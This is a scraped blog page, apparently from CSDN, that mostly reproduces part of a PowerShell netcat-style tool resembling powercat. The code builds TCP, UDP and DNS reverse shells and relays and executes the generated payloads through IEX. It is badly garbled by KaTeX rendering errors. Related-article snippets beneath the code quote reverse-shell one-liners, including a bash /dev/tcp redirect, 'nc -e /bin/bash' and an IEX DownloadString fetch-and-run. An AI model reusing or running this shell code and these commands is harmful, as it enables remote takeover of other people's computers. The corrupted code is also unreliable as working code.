$StdOutBytesRead = F u n c V a r s [ " P r o c e s s " ] . S t a n d a r d O u t p u t . B a s e S t r e a m . E n d R e a d ( FuncVars["Process"].StandardOutput.BaseStream.EndRead( FuncVars["Process"].StandardOutput.BaseStream.EndRead(FuncVars[“StdOutReadOperation”])
if($StdOutBytesRead -eq 0){break}
$Data += F u n c V a r s [ " S t d O u t D e s t i n a t i o n B u f f e r " ] [ 0.. ( [ i n t ] FuncVars["StdOutDestinationBuffer"][0..([int] FuncVars["StdOutDestinationBuffer"][0..([int]StdOutBytesRead-1)]
$FuncVars[“StdOutReadOperation”] = F u n c V a r s [ " P r o c e s s " ] . S t a n d a r d O u t p u t . B a s e S t r e a m . B e g i n R e a d ( FuncVars["Process"].StandardOutput.BaseStream.BeginRead( FuncVars["Process"].StandardOutput.BaseStream.BeginRead(FuncVars[“StdOutDestinationBuffer”], 0, 65536, $null, KaTeX parse error: Expected 'EOF', got '}' at position 11: null) }̲ if(FuncVars[“StdErrReadOperation”].IsCompleted)
{
$StdErrBytesRead = F u n c V a r s [ " P r o c e s s " ] . S t a n d a r d E r r o r . B a s e S t r e a m . E n d R e a d ( FuncVars["Process"].StandardError.BaseStream.EndRead( FuncVars["Process"].StandardError.BaseStream.EndRead(FuncVars[“StdErrReadOperation”])
if($StdErrBytesRead -eq 0){break}
$Data += F u n c V a r s [ " S t d E r r D e s t i n a t i o n B u f f e r " ] [ 0.. ( [ i n t ] FuncVars["StdErrDestinationBuffer"][0..([int] FuncVars["StdErrDestinationBuffer"][0..([int]StdErrBytesRead-1)]
$FuncVars[“StdErrReadOperation”] = F u n c V a r s [ " P r o c e s s " ] . S t a n d a r d E r r o r . B a s e S t r e a m . B e g i n R e a d ( FuncVars["Process"].StandardError.BaseStream.BeginRead( FuncVars["Process"].StandardError.BaseStream.BeginRead(FuncVars[“StdErrDestinationBuffer”], 0, 65536, $null, $null)
}
return D a t a , Data, Data,FuncVars
}
function WriteData_CMD
{
param( D a t a , Data, Data,FuncVars)
F u n c V a r s [ " P r o c e s s " ] . S t a n d a r d I n p u t . W r i t e L i n e ( FuncVars["Process"].StandardInput.WriteLine( FuncVars["Process"].StandardInput.WriteLine(FuncVars[“Encoding”].GetString($Data).TrimEnd(“r").TrimEnd("n”))
return KaTeX parse error: Expected 'EOF', got '}' at position 12: FuncVars }̲ function Clo…FuncVars)
$FuncVars[“Process”] | Stop-Process
}
########## CMD FUNCTIONS ##########

########## POWERSHELL FUNCTIONS ##########
function Main_Powershell
{
param($Stream1SetupVars)
try
{
e n c o d i n g = N e w − O b j e c t S y s t e m . T e x t . A s c i i E n c o d i n g [ b y t e [ ] ] encoding = New-Object System.Text.AsciiEncoding [byte[]] encoding=NewObjectSystem.Text.AsciiEncoding[byte[]]InputToWrite = @()
if($i -ne $null)
{
Write-Verbose “Input from -i detected…”
if(Test-Path KaTeX parse error: Expected '}', got 'EOF' at end of input: i){ [byte[]]InputToWrite = ([io.file]::ReadAllBytes(KaTeX parse error: Expected 'EOF', got '}' at position 5: i)) }̲ elseif…i.GetType().Name -eq “Byte[]”){ [byte[]]$InputToWrite = KaTeX parse error: Expected 'EOF', got '}' at position 3: i }̲ elseif…i.GetType().Name -eq “String”){ [byte[]]$InputToWrite = E n c o d i n g . G e t B y t e s ( Encoding.GetBytes( Encoding.GetBytes(i) }
else{Write-Host “Unrecognised input type.” ; return}
}

  Write-Verbose "Setting up Stream 1... (ESC/CTRL to exit)"
  try{$Stream1Vars = Stream1_Setup $Stream1SetupVars}
  catch{Write-Verbose "Stream 1 Setup Failure" ; return}

  Write-Verbose "Setting up Stream 2... (ESC/CTRL to exit)"
  try
  {
    $IntroPrompt = $Encoding.GetBytes("Windows PowerShell`nCopyright (C) 2013 Microsoft Corporation. All rights reserved.`n`n" + ("PS " + (pwd).Path + "> "))
    $Prompt = ("PS " + (pwd).Path + "> ")
    $CommandToExecute = ""
    $Data = $null
  }
  catch
  {
    Write-Verbose "Stream 2 Setup Failure" ; return
  }

  if($InputToWrite -ne @())
  {
    Write-Verbose "Writing input to Stream 1..."
    try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars}
    catch{Write-Host "Failed to write input to Stream 1" ; return}
  }

  if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; return}

  Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..."
  while($True)
  {
    try
    {
      ##### Stream2 Read #####
      $Prompt = $null
      $ReturnedData = $null
      if($CommandToExecute -ne "")
      {
        try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 | Out-String))}
        catch{[byte[]]$ReturnedData = $Encoding.GetBytes(($_ | Out-String))}
        $Prompt = $Encoding.GetBytes(("PS " + (pwd).Path + "> "))
      }
      $Data += $IntroPrompt
      $IntroPrompt = $null
      $Data += $ReturnedData
      $Data += $Prompt
      $CommandToExecute = ""
      ##### Stream2 Read #####

      if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars}
      $Data = $null
    }
    catch
    {
      Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; return
    }

    try
    {
      $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars
      if($Data.Length -eq 0){Start-Sleep -Milliseconds 100}
      if($Data -ne $null){$CommandToExecute = $Encoding.GetString($Data)}
      $Data = $null
    }
    catch
    {
      Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; return
    }
  }
}
finally
{
  try
  {
    Write-Verbose "Closing Stream 1..."
    Stream1_Close $Stream1Vars
  }
  catch
  {
    Write-Verbose "Failed to close Stream 1"
  }
}

}
########## POWERSHELL FUNCTIONS ##########

########## CONSOLE FUNCTIONS ##########
function Setup_Console
{
param($FuncSetupVars)
$FuncVars = @{}
$FuncVars[“Encoding”] = New-Object System.Text.AsciiEncoding
$FuncVars[“Output”] = $FuncSetupVars[0]
$FuncVars[“OutputBytes”] = [byte[]]@()
$FuncVars[“OutputString”] = “”
return KaTeX parse error: Expected 'EOF', got '}' at position 12: FuncVars }̲ function Rea…FuncVars)
$Data = n u l l i f ( null if( nullif(Host.UI.RawUI.KeyAvailable)
{
$Data = $FuncVars[“Encoding”].GetBytes((Read-Host) + “`n”)
}
return D a t a , Data, Data,FuncVars
}
function WriteData_Console
{
param( D a t a , Data, Data,FuncVars)
switch($FuncVars[“Output”])
{
“Host” {Write-Host -n F u n c V a r s [ " E n c o d i n g " ] . G e t S t r i n g ( FuncVars["Encoding"].GetString( FuncVars["Encoding"].GetString(Data)}
“String” {$FuncVars[“OutputString”] += F u n c V a r s [ " E n c o d i n g " ] . G e t S t r i n g ( FuncVars["Encoding"].GetString( FuncVars["Encoding"].GetString(Data)}
“Bytes” {$FuncVars[“OutputBytes”] += $Data}
}
return KaTeX parse error: Expected 'EOF', got '}' at position 12: FuncVars }̲ function Clo…FuncVars)
if($FuncVars[“OutputString”] -ne “”){return KaTeX parse error: Expected 'EOF', got '}' at position 25: …"OutputString"]}̲ elseif(FuncVars[“OutputBytes”] -ne @()){return $FuncVars[“OutputBytes”]}
return
}
########## CONSOLE FUNCTIONS ##########

########## MAIN FUNCTION ##########
function Main
{
param( S t r e a m 1 S e t u p V a r s , Stream1SetupVars, Stream1SetupVars,Stream2SetupVars)
try
{
[byte[]]$InputToWrite = @()
E n c o d i n g = N e w − O b j e c t S y s t e m . T e x t . A s c i i E n c o d i n g i f ( Encoding = New-Object System.Text.AsciiEncoding if( Encoding=NewObjectSystem.Text.AsciiEncodingif(i -ne $null)
{
Write-Verbose “Input from -i detected…”
if(Test-Path KaTeX parse error: Expected '}', got 'EOF' at end of input: i){ [byte[]]InputToWrite = ([io.file]::ReadAllBytes(KaTeX parse error: Expected 'EOF', got '}' at position 5: i)) }̲ elseif…i.GetType().Name -eq “Byte[]”){ [byte[]]$InputToWrite = KaTeX parse error: Expected 'EOF', got '}' at position 3: i }̲ elseif…i.GetType().Name -eq “String”){ [byte[]]$InputToWrite = E n c o d i n g . G e t B y t e s ( Encoding.GetBytes( Encoding.GetBytes(i) }
else{Write-Host “Unrecognised input type.” ; return}
}

  Write-Verbose "Setting up Stream 1..."
  try{$Stream1Vars = Stream1_Setup $Stream1SetupVars}
  catch{Write-Verbose "Stream 1 Setup Failure" ; return}

  Write-Verbose "Setting up Stream 2..."
  try{$Stream2Vars = Stream2_Setup $Stream2SetupVars}
  catch{Write-Verbose "Stream 2 Setup Failure" ; return}

  $Data = $null

  if($InputToWrite -ne @())
  {
    Write-Verbose "Writing input to Stream 1..."
    try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars}
    catch{Write-Host "Failed to write input to Stream 1" ; return}
  }

  if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; return}

  Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..."
  while($True)
  {
    try
    {
      $Data,$Stream2Vars = Stream2_ReadData $Stream2Vars
      if(($Data.Length -eq 0) -or ($Data -eq $null)){Start-Sleep -Milliseconds 100}
      if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars}
      $Data = $null
    }
    catch
    {
      Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; return
    }

    try
    {
      $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars
      if(($Data.Length -eq 0) -or ($Data -eq $null)){Start-Sleep -Milliseconds 100}
      if($Data -ne $null){$Stream2Vars = Stream2_WriteData $Data $Stream2Vars}
      $Data = $null
    }
    catch
    {
      Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; return
    }
  }
}
finally
{
  try
  {
    #Write-Verbose "Closing Stream 2..."
    Stream2_Close $Stream2Vars
  }
  catch
  {
    Write-Verbose "Failed to close Stream 2"
  }
  try
  {
    #Write-Verbose "Closing Stream 1..."
    Stream1_Close $Stream1Vars
  }
  catch
  {
    Write-Verbose "Failed to close Stream 1"
  }
}

}
########## MAIN FUNCTION ##########

########## GENERATE PAYLOAD ##########
if($u)
{
Write-Verbose “Set Stream 1: UDP”
$FunctionString = (“function Stream1_Setupn{n” + ${function:Setup_UDP} + “n}nn") $FunctionString += ("function Stream1_ReadDatan{n" + ${function:ReadData_UDP} + "n}nn”)
$FunctionString += (“function Stream1_WriteDatan{n” + ${function:WriteData_UDP} + “n}nn") $FunctionString += ("function Stream1_Closen{n" + ${function:Close_UDP} + "n}nn”)
if(KaTeX parse error: Expected '}', got 'EOF' at end of input: l){InvokeString = "Main @(’’,$True,'$p','$t') "} else{$InvokeString = "Main @('$c', F a l s e , ′ False,' False,p’,‘KaTeX parse error: Expected 'EOF', got '}' at position 6: t') "}̲ } elseif(dns -ne “”)
{
Write-Verbose “Set Stream 1: DNS”
$FunctionString = (“function Stream1_Setupn{n” + ${function:Setup_DNS} + “n}nn") $FunctionString += ("function Stream1_ReadDatan{n" + ${function:ReadData_DNS} + "n}nn”)
$FunctionString += (“function Stream1_WriteDatan{n” + ${function:WriteData_DNS} + “n}nn") $FunctionString += ("function Stream1_Closen{n" + ${function:Close_DNS} + "n}nn”)
if(KaTeX parse error: Expected '}', got 'EOF' at end of input: …le."} else{InvokeString = "Main @(‘ c ′ , ′ c',' c,p’,‘ d n s ′ , dns', dns,dnsft) "}
}
else
{
Write-Verbose “Set Stream 1: TCP”
$FunctionString = (“function Stream1_Setupn{n” + ${function:Setup_TCP} + “n}nn") $FunctionString += ("function Stream1_ReadDatan{n" + ${function:ReadData_TCP} + "n}nn”)
$FunctionString += (“function Stream1_WriteDatan{n” + ${function:WriteData_TCP} + “n}nn") $FunctionString += ("function Stream1_Closen{n" + ${function:Close_TCP} + "n}nn”)
if(KaTeX parse error: Expected '}', got 'EOF' at end of input: l){InvokeString = "Main @(’’,$True,$p,$t) "} else{$InvokeString = "Main @('$c', F a l s e , False, False,p,$t) "}
}

if($e -ne “”)
{
Write-Verbose “Set Stream 2: Process”
$FunctionString += (“function Stream2_Setupn{n” + ${function:Setup_CMD} + “n}nn") $FunctionString += ("function Stream2_ReadDatan{n" + ${function:ReadData_CMD} + "n}nn”)
$FunctionString += (“function Stream2_WriteDatan{n” + ${function:WriteData_CMD} + “n}nn") $FunctionString += ("function Stream2_Closen{n" + ${function:Close_CMD} + "n}nn”)
I n v o k e S t r i n g + = " @ ( ′ InvokeString += "@(' InvokeString+="@(e’)nn"
}
elseif($ep)
{
Write-Verbose “Set Stream 2: Powershell”
KaTeX parse error: Expected 'EOF', got '}' at position 26: …ng += "`n`n" }̲ elseif(r -ne “”)
{
if($r.split("😊[0].ToLower() -eq “udp”)
{
Write-Verbose “Set Stream 2: UDP”
$FunctionString += (“function Stream2_Setupn{n” + ${function:Setup_UDP} + “n}nn") $FunctionString += ("function Stream2_ReadDatan{n" + ${function:ReadData_UDP} + "n}nn”)
$FunctionString += (“function Stream2_WriteDatan{n” + ${function:WriteData_UDP} + “n}nn") $FunctionString += ("function Stream2_Closen{n" + ${function:Close_UDP} + "n}nn”)
if(KaTeX parse error: Expected '}', got 'EOF' at end of input: …).Count -eq 2){InvokeString += ("@(’’,$True,'" + $r.split(":")[1] + "','$t') ")} elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',$False,’" + r . s p l i t ( " : " ) [ 2 ] + " ′ , ′ r.split(":")[2] + "',' r.split(":")[2]+",t’) “)}
else{return “Bad relay format.”}
}
if($r.split(”😊[0].ToLower() -eq “dns”)
{
Write-Verbose “Set Stream 2: DNS”
$FunctionString += (“function Stream2_Setupn{n” + ${function:Setup_DNS} + “n}nn") $FunctionString += ("function Stream2_ReadDatan{n" + ${function:ReadData_DNS} + "n}nn”)
$FunctionString += (“function Stream2_WriteDatan{n” + ${function:WriteData_DNS} + “n}nn") $FunctionString += ("function Stream2_Closen{n" + ${function:Close_DNS} + "n}nn”)
if( r . s p l i t ( " : " ) . C o u n t − e q 2 ) r e t u r n " T h i s f e a t u r e i s n o t a v a i l a b l e . " e l s e i f ( r.split(":").Count -eq 2){return "This feature is not available."} elseif( r.split(":").Counteq2)return"Thisfeatureisnotavailable."elseif(r.split("😊.Count -eq 4){$InvokeString += ("@(’" + $r.split("😊[1] + “’,’” + $r.split("😊[2] + “’,’” + r . s p l i t ( " : " ) [ 3 ] + " ′ , r.split(":")[3] + "', r.split(":")[3]+",dnsft) “)}
else{return “Bad relay format.”}
}
elseif($r.split(”😊[0].ToLower() -eq “tcp”)
{
Write-Verbose “Set Stream 2: TCP”
$FunctionString += (“function Stream2_Setupn{n” + ${function:Setup_TCP} + “n}nn") $FunctionString += ("function Stream2_ReadDatan{n" + ${function:ReadData_TCP} + "n}nn”)
$FunctionString += (“function Stream2_WriteDatan{n” + ${function:WriteData_TCP} + “n}nn") $FunctionString += ("function Stream2_Closen{n" + ${function:Close_TCP} + "n}nn”)
if(KaTeX parse error: Expected '}', got 'EOF' at end of input: …).Count -eq 2){InvokeString += ("@(’’,$True,'" + $r.split(":")[1] + "','$t') ")} elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',$False,’" + r . s p l i t ( " : " ) [ 2 ] + " ′ , ′ r.split(":")[2] + "',' r.split(":")[2]+",t’) “)}
else{return “Bad relay format.”}
}
}
else
{
Write-Verbose “Set Stream 2: Console”
$FunctionString += (“function Stream2_Setupn{n” + ${function:Setup_Console} + “n}nn") $FunctionString += ("function Stream2_ReadDatan{n" + ${function:ReadData_Console} + "n}nn”)
$FunctionString += (“function Stream2_WriteDatan{n” + ${function:WriteData_Console} + “n}nn") $FunctionString += ("function Stream2_Closen{n" + ${function:Close_Console} + "n}nn”)
$InvokeString += (”@(’" + $o + “’)”)
}

if(KaTeX parse error: Expected '}', got 'EOF' at end of input: ep){FunctionString += (“function Mainn{n” + KaTeX parse error: Expected 'EOF', got '}' at position 33: …wershell} + "`n}̲`n`n")} else{FunctionString += (“function Mainn{n” + ${function:Main} + “n}n`n”)}
I n v o k e S t r i n g = ( InvokeString = ( InvokeString=(FunctionString + $InvokeString)
########## GENERATE PAYLOAD ##########

########## RETURN GENERATED PAYLOADS ##########
if(KaTeX parse error: Expected '}', got 'EOF' at end of input: …icode.GetBytes(InvokeString))}
elseif($g){Write-Verbose “Returning Payload…” ; return $InvokeString}
########## RETURN GENERATED PAYLOADS ##########

########## EXECUTION ##########
$Output = KaTeX parse error: Expected '}', got 'EOF' at end of input: …try { if(rep)
{
while($True)
{
$Output += IEX $InvokeString
Start-Sleep -s 2
Write-Verbose “Repetition Enabled: Restarting…”
}
}
else
{
$Output += IEX KaTeX parse error: Expected 'EOF', got '}' at position 18: …vokeString }̲ } finally …Output -ne KaTeX parse error: Expected '}', got 'EOF' at end of input: … { if(of -eq “”){KaTeX parse error: Expected 'EOF', got '}' at position 7: Output}̲ else{[io…of,$Output)}
}
}
########## EXECUTION ##########
}

YZBPXX
关注
专栏目录
kali使用nc正向反弹windows shell
09-12 1467
3.kali主机运行终端 并输入 nc 192.168.31.201 8888 回车后,将反弹windows系统shell到Kali终端。2.查看windows系统IP并运行ncat监听8888端口。现在可通过这个shellwindows系统进行任何操作。1.下载 ncat.exe 并上传到windows
Windows反弹shell乱码
墨痕诉清风的博客
04-06 784
Windows反弹shell乱码
[笔记]Windows安全之《一》反弹Shell
二次元怪兽的博客
04-01 2080
powershell反弹shell常见方式 文章目录正向连接和反向连接(反弹连接)PowerShell的配置常见的反弹Shell总结 正向连接和反向连接(反弹连接) PowerShell的配置 常见的反弹Shell 总结
反弹shell原理与实现
hengliang_的博客
03-09 1876
什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的.
raw.githubusercontent.com未能解析” 解决方案
最新发布
-
08-31 467
查了一下原因,raw.githubusercontent.com的DNS解析竟然因某些原因给临时污染了,先临时改host用吧。再ping一下raw.githubusercontent.com,可以ping通,能正常下载了。irm : 未能解析远程名称: 'raw.githubusercontent.com'所在位置 行:1 字符: 27。
渗透测试-window反弹shell
lza20001103的博客
05-11 4747
window反弹shell
linux反弹shell的原理
热门推荐
Shanfenglan's blog
08-24 27万+
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了
Scoop安装、修改默认路径、异常解决
奈德的技术碎碎念
11-27 1万+
​​​​​​​​​​​​​​​​​​​​​​​​​​https://blog.csdn.net/qq_49470767/article/details/109453518 Scoop安装时出现下面问题,解决办法见上述链接 scoop安装时出现使用“1”个参数调用“DownloadString”时发生异常:“未能解析远程名称:raw.githubusercontent.com。 具体步骤如下: 1. 将 C:\Windows\System32\drivers\etc下的host文件拷贝到桌面,打开
python反弹shell_windows命令行反弹shell(一)
weixin_33463850的博客
01-29 1234
前言实战中会遇到各种AV,有时候无法直接反弹到msf或CS中。我们可以婉转一些,先反弹到cmd里再想办法bypass。powershell反弹cmdpowercat是netcat的powershell版本,功能免杀性都要比netcat好用的多。被攻击端运行命令powershell IEX (New-Object System.Net.Webclient).DownloadString('https...
Windows反弹shell测试
oscarli的博客
05-30 341
windows反弹shell测试记录
Windows的几种常用反弹shell方法
hackzkaq的博客
02-21 1万+
零基础学黑客,搜索公众号:白帽子左一 简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。 非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。 1.nc反弹sh
scoop安装时出现使用“1”个参数调用“DownloadString”时发生异常:“未能解析远程名称:raw.githubusercontent.com。”
qq_49470767的博客
11-02 9295
Windows 安装scoop时遇到 出现了解析不了ip 的问题 直接访问raw.githubusercontent.com显示dns 查找失败 我在https://www.ipaddress.com/看到raw.githubusercontent.com有解析] 解决方法:可以拿这个网址的ip 即199.232.68.133 在C:\Windows\System32\drivers\etc\hosts添加本地解析服务 先将hosts 文件复制到桌面, 在hosts 末尾加上 保存后,将桌面的修改后的h
访问raw.githubusercontent.com失败问题处理
Naisu的各种笔记
07-21 1万+
文章目录目的处理方法总结 目的 GitHub上的项目的有些资源是放在 raw.githubusercontent.com 上的,通常我们在安装某些软件的时候会从该地址下载资源,直接访问的话经常容易失败。这篇文章将对相关处理方法做个说明。 处理方法 无法访问某些域名的情况可能有多种原因,比如网站本身的问题、不可描述的原因、网络运营商的问题、DNS相关的问题等待。如果是网站本身的问题那什么办法都没有;如果是不可描述的原因就得用魔法了;如果是网络运营商的问题那就投诉或者换运营商;如果是DNS相关的问题那可以通过
无法解析远程名称
Cjiaocsda1127的专栏
09-18 1万+
分析原因:服务器DNS解析错误,无法访问到调用的远程服务器。原因是:服务器不能上外网。     解决办法如下:         在服务器上执行:开始|运行|cmd  ping www.***com  //注:ping 后面的地址是你调用的远程服务器的域名。         如果可以ping通,说明DNS解析正确。         如果ping不通,找一台可以在公网访问到的机器再ping一下...
raw.githubusercontent.com进不去
m0_74963183的博客
06-29 319
选一个,在host添加(路径:C:\WINDOWS\system32\drivers\etc),在下方搜索框里输入。
解决curl: (7) Failed to connect to raw.githubusercontent.com port 443: Connection refused 问题
Jolting的博客
07-24 4万+
解决homebrew下载 raw.githubusercontent.com port 443: Connection refused问题
解决curl安装成功之后 curl --version -bash: curl: command not found的问题
m0_49358345的博客
04-04 3125
查询的确已经安装了 rpm -qa|grep curl python-pycurl-7.19.0-19.el7.x86_64 libcurl-7.29.0-59.el7_9.1.x86_64 curl-7.29.0-59.el7_9.1.x86_64 还是无法正常使用 curl --version -bash: curl: command not found 卸载重装: rpm -e --nodeps curl 警告:文件 /usr/bin/curl: 移除失败: 没有那个文件或目录 yum remove
解决raw.githubusercontent.com无法访问的问题
__hao__的博客
05-13 3万+
不是什么原创,就是个人稍微记录一下。 Windows上可以这样办: 上https://www.ipaddress.com查一下raw.githubusercontent.com的ipv4地址,比如我现在查到的是199.232.68.133。 使用管理员权限打开C:/Windows/System32/hosts文件,添加一行 199.232.68.133 raw.githubusercontent.com # comments. put the address here 或者管理员权限开或.
curl命令详解
weixin_34006468的博客
06-14 763
cURL.1 手册页名称cURL - transfer a URL摘要cURL[选项] [URL... ]描述cURL 是一个向服务器或从服务器传输数据的工具,它支持HTTP 、HTTPS、FTP 、FTPS 、SCP、SFTP、TFTP、DICT、TELNET、LDAP 或FILE 等协议。该命令设计为无需用户干预即可执行。cURL 提供了一大堆诸如代理支持、用户认证、FT...
windows 反弹shell
07-29
Windows系统中,反弹shell是一种常见的攻击技术,用于获取对目标机器的远程访问权限。有几种常见的方法可以实现Windows反弹shell。 一种方法是使用Metasploit框架。首先,使用msfvenom生成一个powershell类型的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值